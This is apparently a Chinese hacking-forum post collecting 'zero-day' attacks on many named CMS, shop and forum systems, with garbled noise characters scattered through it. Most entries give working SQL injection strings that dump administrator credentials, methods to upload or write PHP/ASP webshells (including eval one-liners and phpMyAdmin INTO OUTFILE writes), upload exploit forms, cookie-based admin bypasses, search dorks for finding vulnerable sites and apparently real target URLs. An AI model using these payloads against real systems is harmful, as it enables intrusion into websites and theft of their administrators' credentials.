0day合集

admin

启航企业建站系统 cookie注入漏洞通杀所有版本
% O! k8 Z8 e3 ]  L, l
直接上exploit:
0 s9 V" a/ q6 B. b& y! Bjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
7 T# ^3 g# Y9 [test:http://www.tb11.net/system/xitong/shownews.asp?id=210
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Asprain论坛 注册用户 上传图片就可拿到webshell

Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛，一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
1.txt存放你的一句话马 如：<%execute(request("cmd"))%>
9 _' A# ]# t" t+ @3 m2.gif 为一小图片文件，一定要小，比如qq表情图片
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头，但是现在传上去还不行，我接下来就用
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
5.q.asp;.gif
google：Powered by Asprain
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 V1 c! M3 ^* a: a$ ^
5 k5 n3 W3 x' G$ d- g6 s0 K% mShopNum1全部系统存在上传漏洞。

' w5 r: w4 C: ~8 y首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
按说明 提示登录后台。。
" k! S! W0 K, k+ ]' a8 Z& n在后台功能页面->附件管理->附件列表
可以直接上传.aspx 后缀木马
http://demo.shopnum1.com/upload/20110720083822500.aspx
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. v1 r. Z5 G; I7 V: B  M" M
- x% e: C; O, t5 Z* h牛牛CMS中小企业网站管理系统 上传漏洞

牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
( N* \+ J  B, q7 g& W+ h后台:admin/login.asp
ewebeditor 5.5 Nday
( d3 U+ w' z  `7 ?9 Wexp:
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
<input?type=file?name=uploadfile?size=100><br><br>?
<input?type=submit?value=upload>?
</form>
( [& q0 k' a$ c. V/ \, V- @# }ps:先上传小马.
inurl:member/Register.asp 您好，欢迎来到立即注册立即登录设为首页加入收藏
" `* X8 {& C, l7 A; |1 D
7 J" m1 i, w- Q7 M- `--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

YothCMS 遍历目录漏洞

5 z6 m9 h/ A3 Q9 R优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
默认后台:admin/login.asp
遍历目录:
# a4 T& M4 a: ^. Y# @ewebeditor/manage/upload.asp?id=1&dir=../
; d3 f/ u+ ^4 V6 r  Sdata:
- w/ k( a7 Z9 ^/ ohttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
9 b7 ~. u) _" E$ C7 @4 [--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 N. _* f  q! C. u: T( K' V% R& ]
& p6 ?9 m. t: l: RNet112企业建站系统 1.0

7 r% m$ G* a, h3 u  t7 X源码简介：
Net112企业建站系统，共有：新闻模块，产品模块，案例模块，下载模块，相册模块，招聘模块，自定义模块，友情链接模块 八大模块。
添加管理员：
) A7 d3 x& c6 ?" ]# C9 shttp://www.0855.tv/admin/admin.asp?action=add&level=2
其实加不加都不是很重要，后台文件都没怎么作验证。
上传路径：
4 p# W% ?4 q$ Jhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
http://www.0855.tv/inc/Upfile.asp?Stype=2
怎么利用自己研究。
2 X7 V8 d, a& S4 k* j) S遍历目录：
http://www.0855.tv/admin/upfile.asp?path=../..
3 b) _2 p* g& M) ~2 u7 {5 S如：
http://www.0855.tv/admin/upfile.asp?path=../admin
http://www.0855.tv/admin/upfile.asp?path=../data
& [; s6 C! C& |. b2 S+ ?, g--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 q. P9 Y& O9 L& x
$ n# k- l, z3 g% T$ t2 `" ]7 E/ {易和阳光购物商城通杀 上传漏洞
" l4 O2 O. Q5 |% J. H
前提要求是IIS6.0+asp坏境。
/ k7 B- |4 r% i( ?+ T$ W* z漏洞文件Iheeo_upfile.asp
; p" O8 D- b9 H3 W0 X过滤不严.直接可以iis6.0上传
把ASP木马改成0855.asp;1.gif
直接放到明小子上传
Google搜索：inurl:product.asp?Iheeoid=
2 M! Y* l" D( R  C) z% w; Z' ^--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% D( l1 J/ D9 M5 Q' M1 I
phpmyadmin后台4种拿shell方法
9 j! W5 u5 T9 [" u8 Z2 q
方法一：
$ F* w! H* O, D; Y" O0 A5 S8 DCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
9 g6 ?  P$ j, s3 BINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
( ^) s5 D0 e, y$ R----以上同时执行，在数据库: mysql 下创建一个表名为：xiaoma，字段为xiaoma1，导出到E:/wamp/www/7.php
" q% b) |! n/ `4 Z9 i3 R% D一句话连接密码：xiaoma
方法二：
7 m' i' s+ V8 P1 Y( N% iCreate TABLE xiaoma (xiaoma1 text NOT NULL);
' M  Z' d6 u4 M8 }Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
Drop TABLE IF EXISTS xiaoma;
  e( U/ G- n5 S  k, B方法三：
3 M" u+ ~% U) ^. }* T2 c3 b读取文件内容：    select load_file('E:/xamp/www/s.php');
5 W/ g- e5 ~' T4 y写一句话：select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
cmd执行权限：select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
方法四：
5 l0 r) \; Y% Y# |/ ]( hselect load_file('E:/xamp/www/xiaoma.php');
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
4 B. F0 d2 `+ ~9 M! W  Z3 S' g然后访问网站目录：http://www.xxxx.com/xiaoma.php?cmd=dir
: ]; T- t! O2 g--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 M+ w4 Y8 @' M
1 s4 [: ]2 H" Z& q' T+ m传信网络独立开发网站源码0day漏洞

后台system/login.asp
进了后台有个ewebeditor
0 q' N# k+ n; K5 I+ [. HGoogle 搜索inurl:product1.asp?tyc=
# U3 B! O4 ]" V% z* z编辑器漏洞默认后台ubbcode/admin_login.asp
% }: ^  d6 {! a2 g% Y( W5 l- _% L数据库ubbcode/db/ewebeditor.mdb
默认账号密码yzm 111111
+ V3 H  K9 i8 W4 u( @
拿webshell方法
登陆后台点击“样式管理”-选择新增样式
* r: A3 U1 ]1 a+ Y1 I样式名称:scriptkiddies 随便写
路径模式：选择绝对路径
图片类型：gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
图片类型比如就是我们要上传的ASP木马格式
上传路径：/
/ ]$ `: f8 w7 c图片限制：写上1000 免的上不了我们的asp木马
0 T+ z6 A# [7 e* S7 z( [( Y上传内容不要写
" o1 C4 q8 a0 \- Q* I8 n: _* B可以提交了
8 O) Q; P# Y! s8 @  d+ Q* I9 f样式增加成功！
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
! S$ T0 H, H# N$ Z* c3 `按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
上ASP木马 回车 等到路径

后台：system/login.asp
+ Q2 M) W) y0 U' vExp:
) c; U3 y4 }# ]: ]# `3 B( Uand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
测试:
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
, F' t" w4 g% f- jhttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

" D- x/ O" C9 ^6 x5 t, d+ }foosun 0day 最新注入漏洞

漏洞文件：www.xxx.com/user/SetNextOptions.asp
: r) H& b& O& B& t7 `利用简单的方法：
暴管理员帐号：
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
* [  ~# I/ j7 |7 d" |暴管理员密码：
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
6 @% J8 a0 s% Y--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

网站程序的版权未知！
9 Z1 R$ F: a( O. b
' `0 a$ F" l2 b- s9 i默认网站数据库：
www.i0day.com/data/nxnews.mdb
# ^. y# G, f# R) p) Z4 n+ r# @2 p. @" }ewebeditor 在线编辑器：
: c+ N" `& W- ]1 G6 D编辑器数据库下载地址：www.i0day.com/ewebeditor/db/ewebeditor.mdb
5 r( Y* f3 b- Y7 Y: I" u& e登录地址：ewebeditor/admin_login.asp
默认密码：admin  admin
5 I9 n& e. {3 _7 p2 X! N% I登陆后可遍历目录：ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
7 O1 q  b8 s7 Y- X" p+ Q' k& H, `8 \
% Z: M: ?% i( h# ESql注入漏洞：
http://www.i0day.com/detail.asp?id=12
3 X5 K# D9 N) F3 ?exp:
8 V( G# `# L4 k" m& ^6 `5 X  tunion select 1,admin,password,4,5,6,7,8 from admin
+ |" b) ?- {& A) U1 T爆出明文帐号/密码

上传漏洞：
6 ~5 {5 Z1 s* W; L# U( l: Z后台+upfile.asp
如：
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
shell的地址：网址+后台+成功上传的马
google:inurl:news.asp?lanmuName=
------------------------------------------------------------------------------------------------------------------------------------------------------------------------

dedecms最新0day利用不进后台直接拿WEBSHELL

拿webshell的方法如下：
网传的都是说要知道后台才能利用，但不用，只要 plus 目录存在，服务器能外连，就能拿shell.
$ T( A# I, t  M7 J. P1 e* l0 |前题条件，必须准备好自己的dede数据库，然后插入数据：
' G9 v; N" z4 P3 Tinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
  ?+ c5 ~) y' x1 i& d<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
! m1 M! a2 c+ R/ K- g9 l<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
! z5 u! i- |& V! F  n9 G0 q5 g0 n<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
5 C7 Z- E% G5 E  B- v- l<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
  S# A5 R+ R2 a2 }% k! nfunction addaction()
( U8 K6 C$ z6 _& F* w7 C* P# q{
" ?1 v: o  _4 A4 k9 [document.QuickSearch.action=document.QuickSearch.doaction.value;
$ `8 C) A$ P( A7 ?}
" c% T" R- y% Z6 B' r& m) Z) `</script>
-----------------------------------------------------------------------------------------------------------------------------------------------

6 o. {' D/ y; y0 hdedecms织梦暴最新严重0day漏洞
bug被利用步骤如下：
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
- Z$ b6 h3 Q* S" g  N把上面{}上的字母改为当前的验证码，即可直接进入网站后台。
-------------------------------------------------------------------------------------------------------------------------------------------
/ |, m3 w5 V* x' \# _% L' K
) V+ K/ _4 G( a) _5 N7 @) L8 Y多多淘宝客程序上传漏洞
漏洞页面：
admin\upload_pic.php
4 b* T0 a- r) x8 f2 Q$ D8 L传送门：
$ p7 e! `0 v, chttp://www.www.com/admin/upload_pic.php?uploadtext=slide1
PS:copy张图片马 直接  xxx.php 上传抓包地址！
% Y; z+ x/ G. q& W------------------------------------------------------------------------------------------------------------------------------------------------------
$ X; k% Y; ?7 l
无忧公司系统ASP专业版后台上传漏洞
漏洞文件 后台上传
admin/uploadPic.asp
漏洞利用 这个漏洞好像是雷池的
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
; _1 K* C# m; G; x等到的webshell路径：
8 ~  H* a  D* _1 z* |! Z! d, X/UploadFiles/scriptkiddies.asp;_2.gif
1 A: Y2 v4 ?& Z4 k: H0 d( K* v---------------------------------------------------------------------------------------------------------------------------------------------------
9 n' V7 @2 Q! I( @! L/ e" D: x( w
5 P: ~; v& D+ ]" A5 z住哪酒店分销联盟系统2010
Search：
inurl:index.php?m=hotelinfo
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
默认后台：index.php?m=admin/login
--------------------------------------------------------------------------------------------------------------------------------------------------

inurl:info_Print.asp?ArticleID=
后台 ad_login.asp
爆管理员密码：
7 K. B5 [; K+ {+ u4 Q% m3 Xunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
: f( I, O% k) t$ J6 n+ H. \6 R------------------------------------------------------------------------------------------------------------------------------------------------------------
0 I9 ^4 V) C4 i' g4 P  C
: C4 L$ Z! S9 v- ?搜索框漏洞！
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
1 l* X; G; W9 q' w# d; }) `--------------------------------------------------------------------------------------------------------------------------------------------------------
- i: W. }2 W& \  r; }$ G8 t
  [4 ]9 \. m* L关键字：
inurl:/reg_TemletSel.asp?step=2
或者
/ v/ n7 e" {7 ]  I7 l& e, D电子商务自助建站--您理想的助手
-------------------------------------------------------------------------------------------------------------------------------------------------
. ?) {1 I* v+ Z! g
iGiveTest 2.1.0注入漏洞
Version: <= 2.1.0
# Homepage: http://iGiveTest.com/
5 h- \1 u  z/ E- J3 n8 i4 ~4 ?谷歌关键字: “Powered by iGiveTest”
; I; Y% m: A8 j" C, X) B% I9 h随便注册一个帐号。然后暴管理员帐号和密码
7 t" R/ K1 I1 V3 D$ hhttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
0 u/ D. G3 @- p5 W' z7 _------------------------------------------------------------------------------------------------------------------------------------------------

CKXP网上书店注入漏洞
工具加表:shop_admin 加字段:admin
后台:admin/login.asp
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
0 {' [( v! e" g6 L--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 v3 V0 v" l* d  O& c
段富超个人网站系统留言本写马漏洞
0 F. a+ L( }! S; k- D源码下载：http://www.mycodes.net/24/2149.htm
" I5 J- Z, W/ M4 C0 Y& b( ^3 ]addgbook.asp 提交一句话。
连接： http://www.xxxx.tv/date/date3f.asp
  Z! u) N: _! S7 R8 n3 h; ?6 jgoogle:为防批量，特略！
/ }3 P- {' D$ ~) F, C-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' a8 S* U8 N: ]& K. R/ N
智有道专业旅游系统v1.0 注入及列目录漏洞
默认后台路径：/admin/login.asp
2 L& K0 D+ m1 {" {+ m5 _默认管理员：admin
. ^4 g1 {/ ]6 h# k8 m4 C默认密码：123456
SQL EXP Tset:
) A7 Z8 d6 k5 b: I) b! t% Chttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
------------------------------------------------------------------------------------------------------------------------------------------------------------------------

, I$ q  n1 f: i/ {ewebeditor(PHP) Ver 3.8 本任意文件上传0day
EXP：
<title>eWebeditoR3.8 for php任意文件上EXP</title>
<form action="" method=post enctype="multip
art/form-data">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
' i) E7 t5 g0 D9 n  f4 C- Z; [URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
/ D/ F1 X& t+ M$ ifile:<input type=file name="uploadfile"><br>
<input type=button value=submit onclick=fsubmit()>
+ W% v6 C" Q# r, h  S" ^2 N% k& \</form><br>
<script>
0 T# m( p* j/ V3 P* h9 x8 X  Sfunction fsubmit(){
# d$ p" q! Q% G  Bform = document.forms[0];
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
# w9 [, h* h) R( U' Dalert(form.action);
) b! i3 e7 ^# I2 kform.submit();
}
</script>
8 W8 w5 U/ ~/ ?+ ?注意修改里面ewebeditor的名称还有路径。
- u; H% E( _% E* M" t) P---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; Z3 A6 b, ?3 u+ Z  W2 q
提交’时提示ip被记录 防注入系统的利用
网址：http://www.xxx.com/newslist.asp?id=122′
提示“你的操作已被记录!”等信息。
利用方法：www.xxx.com/sqlin.asp看是否存在，存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
3 y5 x: n: G- w8 k7 ]% F-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

* P" \" W) l; j6 G/ w1 O* e8 y( Y/ ?西部商务网站管理系统 批量拿shell-0day
3 `  b' i6 n! Z" ?这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
& a6 B+ {! s& G; H* m---------------------------------------------------------------------------------------------------------------------------------------------------------------------------

JspRun!6.0 论坛管理后台注入漏洞

SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
2 `# [8 |4 @! i# SJspRun!6.0
漏洞描述:
' j# c1 D% N) `: b' gJspRun!论坛管理后台的export变量没有过滤，直接进入查询语句，导致进行后台，可以操作数据库，获取系统权限。
在处理后台提交的文件中ForumManageAction.java第1940行
String export = request.getParameter("export");//直接获取，没有安全过滤
6 S7 ?. ^- m$ q2 |7 K! S- Lif(export!=null){
0 j0 S) y* N7 s" Q2 _List&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语，执行了...
if(styles==null||styles.size()==0){
% @/ V* x! e  {6 f# y<*参考
& _$ i, F5 S! P& h3 u% o0 s! anuanfan@gmail.com
1 U# l7 x4 M0 {6 x0 ]; e4 m& @  `*> SEBUG安全建议:
www.jsprun.net
（1）安全过滤变量export
（2）在查询语句中使用占位符
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( ^' v& d2 m3 o
8 u0 c* f# E* _0 P6 b乌邦图企业网站系统 cookies 注入

程序完整登陆后台:/admin/login.asp
. w- r% c+ c, h( x# j. u9 V8 T默认登陆帐号:admin 密码:admin888
语句：(前面加个空格)
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
或者是16个字段：
3 G4 c- E6 W5 z! \; xand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
爆不出来自己猜字段。
# w' E* r+ }$ f" l" j+ q注入点：http://www.untnt.com/shownews.asp?=88
+ N/ O3 }9 E! D8 X& p) V$ u( ^getshell:后台有备份，上传图片小马。备份名：a.asp 访问 xxx.com/databakup/a.asp
关键字：
inurl:shownews?asp.id=
3 _! @# Z, _* @" }-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% h0 w# F3 Z; w" ^5 D2 f
CKXP网上书店注入漏洞

% |# }! E8 m' i% }/ t6 X5 \工具加表:shop_admin 加字段:admin
后台:admin/login.asp
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! }& v2 e1 M. G7 n/ [( |5 c
/ u& v) D% v( U0 T1 {6 hYxShop易想购物商城4.7.1版本任意文件上传漏洞

http://xxoo.com/controls/fckedit ... aspx/connector.aspx
跳转到网站根目录上传任意文件。
如果connector.aspx文件被删可用以下exp，copy以下代码另存为html，上传任意文件
) y) F- @" n; q) H<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
4 Q  h' R, u. q: i$ dUpload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
( f$ I4 q+ D) L8 E4 x/ U3 w6 O<input id="btnUpload" type="submit" value="Upload">
/ M% D0 O: G. R: I6 |) P+ [$ L, J</form>
. @+ j  s% \8 r" Z1 @: `8 A7 z-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  H- Y* D- D5 C' W
SDcms 后台拿webshell

! C- l/ D1 f4 c" S% ]4 N第一种方法：
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
5 y1 n& u* s) h- d% Z把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx
用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。
2 u* L5 `3 E) S1 c5 T% ^; j% ?第二种方法：
  T* W8 Y. e; ]1 b1 c, |进入后台-->系统管理-->系统设置-->系统设置->上传设置;
6 e1 K2 H) V3 C6 y  ~2 {在文件类型里面添加一个aaspsp的文件类型，然后找一个上传的地方直接上传asp文件！ 注：修改文件类型后不能重复点保存！
7 `3 q7 M) c0 P3 Q# Y9 ]: ^# U第三种方法：
进入后台-->界面管理-->模板文件管理-->创建文件
- @5 H, Q3 |, p7 f( M5 Q: ]文件名写入getshell.ashx
内容写入下面内容：
/====================复制下面的=========================/
% K9 n3 v7 K6 m. w4 o. M. W  N<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
# |& u6 F% d" J. b2 K* Dpublic class Handler : IHttpHandler {
- _& b% q) l# [4 vpublic void ProcessRequest (HttpContext context) {
+ a# G" k, f! g, Z$ [context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
' ^- e; ~, }' _1 K6 dfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
" P% n) {6 {; C* B( Ifile1.Flush();
file1.Close();
}
  c8 C3 M0 T3 G. F3 S9 F8 P% Cpublic bool IsReusable {
get {
return false;
2 \0 B% O' |5 [( m# p3 [1 V: ?}
' f4 e4 s' i) d5 z6 K}
  D& e1 [# O& f! M! m6 B- c# _}
/=============================================/
( x0 y- I. K# K: T. Y6 b  Y. p访问这个地址：http://www.xxx.com/skins/2009/getshell.ashx
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
4 X' [+ K0 F$ O-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

  E9 O/ P/ |, J( t& B6 F" u8 w+ ^ESCMS网站管理系统0day
! J2 n/ X3 w6 ]* D, h) ^
后台登陆验证是通过admin/check.asp实现的
) C, ~- ^& T8 J
1 a% m& n  f: v9 c$ c" a' C3 i) C首先我们打开http://target.com/admin/es_index.html
然后在COOKIE结尾加上
6 Y, T0 D  Z' c; V; ESCMS$_SP2=ES_admin=st0p;
修改,然后刷新
4 Q8 q/ |" }) p$ @; P3 Q) z进后台了嘎..
8 T* r$ _  ?0 \, C6 G* ?$ I然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL

) j7 Q2 [! }, w% R利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
0 m" f% ]" D4 [+ z% K在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& v. ]& y$ F% d8 `2 S. q
宁志网站管理系统后台无验证漏洞及修复

  w( d  z: O. m网上搜了一下,好像没有发布.如有雷同纯粹巧合!
# V; l: C) H$ w官方网站:www.ningzhi.net
学校网站管理系统 V.2011版本
( O& `  P( S6 K0 w4 P" M$ ehttp://down.chinaz.com/soft/29943.htm
  a0 c+ F& z7 Z0 ?其它版本(如:政府版等),自行下载.
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
login.asp代码如下:
- _, w; F% O- `3 K+ W8 U8 D5 m<%  response.Write"<script language=javascript>alert('登陆成功！请谨慎操作！谢谢！');this.location.href='manage.asp';</script>" %>
manage.asp代码我就不帖出来了.反正也没验证.
3 _. l& r" |2 S' f. {只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
漏洞利用:
直接访问http://www.0855.tv/admin/manage.asp
/ a" `. D0 u1 X" t: |. |+ y数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
& }* D  K3 `6 b" X; \0 |! _----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' d, n/ [: w, @/ ]
# o5 v3 W: ^3 E7 A+ \8 Fphpmyadmin拿shell的四种方法总结及修复
! F" W8 z$ O% Q5 G9 V* J$ j
& k' K- J, x& L/ y! `7 y1 T+ {, F方法一：
) }, _+ c; \! U0 E/ a, M6 bCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
6 [: \! @1 X& s' {/ _, qINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
1 U/ Y1 z( y2 y5 O$ S2 Z$ p& @----以上同时执行，在数据库: mysql 下创建一个表名为：study，字段为7on，导出到E:/wamp/www/7.php
    一句话连接密码：7on
方法二：
6 o1 f2 c0 n/ S& Z$ g0 M8 J读取文件内容：    select load_file('E:/xamp/www/s.php');
+ L; B" h) c4 y* r" w& w* r写一句话：    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
cmd执行权限：    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
+ o0 y0 _! K7 c方法三：
JhackJ版本 PHPmyadmin拿shell
Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
select cmd from study into outfile 'E:/wamp/www/7.php';
* d% J/ N8 b4 g) [  n8 E. ~Drop TABLE IF EXISTS study;
$ J3 M% e9 u" X% g8 C* q' {/ \9 p<?php eval($_POST[cmd])?>
' C5 E1 {8 t; P" YCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
0 @* i2 b% t. V) YINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数： 1
$ L2 A5 p3 r8 b( e5 ?SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数： 1
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
1 Y; X8 [$ \% o# T" x方法四：
select load_file('E:/xamp/www/study.php');
6 J+ I1 C$ W1 G5 J* J# J9 g5 Dselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
然后访问网站目录：http://www.2cto.com/study.php?cmd=dir
" N- ?9 u# A3 H( }-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 D( g7 J% [1 b0 z2 W8 J, F! K
NO.001中学网站管理系统 Build 110628 注入漏洞
  {* F; `- a: M' i
: F5 D7 r* k- fNO.001中学网站管理系统功能模块:
